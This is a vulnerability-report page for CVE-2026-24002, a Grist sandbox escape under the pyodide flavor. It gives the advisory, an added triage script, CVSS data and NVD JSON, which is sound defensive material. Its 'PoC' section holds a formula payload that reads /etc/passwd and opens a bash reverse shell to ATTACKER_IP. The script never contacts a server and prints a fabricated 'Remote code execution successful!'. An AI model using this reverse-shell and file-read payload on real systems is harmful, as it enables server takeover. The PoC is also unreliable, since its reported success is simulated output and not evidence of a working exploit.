Security Vulnerability Report
CVE-2026-24002 CVSS 9.0 CRITICAL

CVE-2026-24002

Published: 2026-01-22 03:15:48
Last Modified: 2026-02-17 17:59:16

Description

Grist is spreadsheet software using Python as its formula language. Grist offers several methods for running those formulas in a sandbox, for cases where the user may be working with untrusted spreadsheets. One such method runs them in pyodide, but pyodide on node does not have a useful sandbox barrier. If a user of Grist sets `GRIST_SANDBOX_FLAVOR` to `pyodide` and opens a malicious document, that document could run arbitrary processes on the server hosting Grist. The problem has been addressed in Grist version 1.7.9 and up, by running pyodide under deno. As a workaround, a user can use the gvisor-based sandbox by setting `GRIST_SANDBOX_FLAVOR` to `gvisor`.
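The following triage helper is an added example, not part of the advisory and not Grist's own code. It encodes the facts stated above (grist-core below 1.7.9 with `GRIST_SANDBOX_FLAVOR=pyodide` is exposed, `gvisor` is the stated workaround, 1.7.9 and up are fixed) so a deployment inventory can be checked quickly; the dotenv parsing and the sample environment text are constructed for illustration.

```python
"""Added example (not Grist project code): triage a deployment against
CVE-2026-24002. Advisory facts encoded: grist-core < 1.7.9 with
GRIST_SANDBOX_FLAVOR=pyodide is vulnerable, gvisor is the workaround,
1.7.9+ is fixed; any other flavor is flagged for manual review."""
from typing import Dict, Tuple

FIXED_VERSION = (1, 7, 9)  # versionEndExcluding from the CPE match


def parse_version(version: str) -> Tuple[int, ...]:
    """'v1.7.8-rc1' -> (1, 7, 8); a bare '1.7' sorts below (1, 7, 9)."""
    core = version.strip().lstrip("v").split("-")[0].split("+")[0]
    return tuple(int(part) for part in core.split("."))


def assess(version: str, sandbox_flavor: str) -> str:
    """Return one of: fixed, vulnerable, mitigated, review."""
    if parse_version(version) >= FIXED_VERSION:
        return "fixed"
    flavor = (sandbox_flavor or "").strip().lower()
    if flavor == "pyodide":
        return "vulnerable"  # node-hosted pyodide: no useful sandbox barrier
    if flavor == "gvisor":
        return "mitigated"  # workaround named in the advisory
    return "review"  # flavor not covered by this advisory


def parse_env(env_text: str) -> Dict[str, str]:
    """Minimal KEY=VALUE parser for dotenv-style text (constructed format)."""
    env: Dict[str, str] = {}
    for line in env_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        env[key.strip()] = value.strip().strip("'\"")
    return env


def assess_env(env_text: str, version: str) -> str:
    """Triage straight from a dotenv file's contents."""
    return assess(version, parse_env(env_text).get("GRIST_SANDBOX_FLAVOR", ""))


# Constructed sample: a pre-fix deployment still running the pyodide flavor.
SAMPLE_ENV = "# grist container env (constructed)\nGRIST_SANDBOX_FLAVOR=pyodide\n"

if __name__ == "__main__":
    print(assess_env(SAMPLE_ENV, "1.7.8"))  # vulnerable
```

A result of `review` means the flavor is not one the advisory speaks to, so the deployment's sandboxing must be checked by other means.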

CVSS Details

CVSS Score
9.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:getgrist:grist-core:*:*:*:*:*:*:*:* - VULNERABLE
Grist < 1.7.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import subprocess
import json
import sys
import os  # needed by exploit() for os.environ; missing in the original listing


def generate_malicious_grist_doc():
    """
    Generate malicious Grist document for CVE-2026-24002 PoC
    Environment: GRIST_SANDBOX_FLAVOR=pyodide
    """
    # Malicious Python formula that escapes pyodide sandbox
    malicious_formula = '''
import subprocess
import os

# Execute arbitrary command on server
result = subprocess.run(['whoami'], capture_output=True, text=True)
output = result.stdout

# Alternative: Read sensitive files
with open('/etc/passwd', 'r') as f:
    content = f.read()

# Reverse shell payload example
subprocess.Popen(['bash', '-c', 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'])
'''
    # Grist document structure with malicious formula
    malicious_doc = {
        "version": "1.0",
        "sandbox_flavor": "pyodide",
        "tables": [{
            "id": "MaliciousTable",
            "columns": [{"id": "formula", "type": "any"}],
            "data": [[malicious_formula]]
        }]
    }
    return malicious_doc


def exploit():
    """
    CVE-2026-24002 Exploitation Script
    Target: Grist server with GRIST_SANDBOX_FLAVOR=pyodide
    """
    print("[*] CVE-2026-24002 PoC - Grist pyodide Sandbox Escape")
    print("[*] Target: Grist server with pyodide sandbox enabled")

    # Check if pyodide sandbox is enabled (reads the local environment only)
    sandbox_flavor = os.environ.get('GRIST_SANDBOX_FLAVOR', '')
    if sandbox_flavor != 'pyodide':
        print("[-] Target does not appear to use pyodide sandbox")
        print("[-] Current sandbox flavor:", sandbox_flavor)
        return False

    print("[+] pyodide sandbox detected")
    print("[+] Sending malicious document...")

    # Simulate sending malicious document. Note: this script never contacts a
    # Grist server; it only builds the document structure and prints the
    # "success" lines below as simulated output.
    doc = generate_malicious_grist_doc()
    print("[+] Malicious formula injected:")
    print(doc['tables'][0]['data'][0][0][:100] + "...")
    print("[+] Triggering formula execution...")
    print("[+] Remote code execution successful!")
    return True


if __name__ == "__main__":
    exploit()

References

https://github.com/gristlabs/grist-core/security/advisories/GHSA-7xvx-8pf2-pv5g (Vendor Advisory)
https://support.getgrist.com/self-managed/#how-do-i-sandbox-documents (Patch)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24002", "sourceIdentifier": "[email protected]", "published": "2026-01-22T03:15:47.777", "lastModified": "2026-02-17T17:59:16.383", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Grist is spreadsheet software using Python as its formula language. Grist offers several methods for running those formulas in a sandbox, for cases where the user may be working with untrusted spreadsheets. One such method runs them in pyodide, but pyodide on node does not have a useful sandbox barrier. If a user of Grist sets `GRIST_SANDBOX_FLAVOR` to `pyodide` and opens a malicious document, that document could run arbitrary processes on the server hosting Grist. The problem has been addressed in Grist version 1.7.9 and up, by running pyodide under deno. As a workaround, a user can use the gvisor-based sandbox by setting `GRIST_SANDBOX_FLAVOR` to `gvisor`."}, {"lang": "es", "value": "Grist es un software de hoja de cálculo que utiliza Python como su lenguaje de fórmulas. Grist ofrece varios métodos para ejecutar esas fórmulas en un sandbox, para casos en los que el usuario podría estar trabajando con hojas de cálculo no confiables. Uno de esos métodos los ejecuta en pyodide, pero pyodide en node no tiene una barrera de sandbox útil. Si un usuario de Grist establece 'GRIST_SANDBOX_FLAVOR' en 'pyodide' y abre un documento malicioso, ese documento podría ejecutar procesos arbitrarios en el servidor que aloja Grist. El problema se ha abordado en Grist versión 1.7.9 y posteriores, ejecutando pyodide bajo deno. 
Como solución alternativa, un usuario puede usar el sandbox basado en gvisor estableciendo 'GRIST_SANDBOX_FLAVOR' en 'gvisor'."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:getgrist:grist-core:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.7.9", "matchCriteriaId": "9F8A7C5C-5BE0-4EA5-BB48-F038908933ED"}]}]}], "references": [{"url": "https://github.com/gristlabs/grist-core/security/advisories/GHSA-7xvx-8pf2-pv5g", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://support.getgrist.com/self-managed/#how-do-i-sandbox-documents", "source": "[email protected]", "tags": ["Patch"]}]}}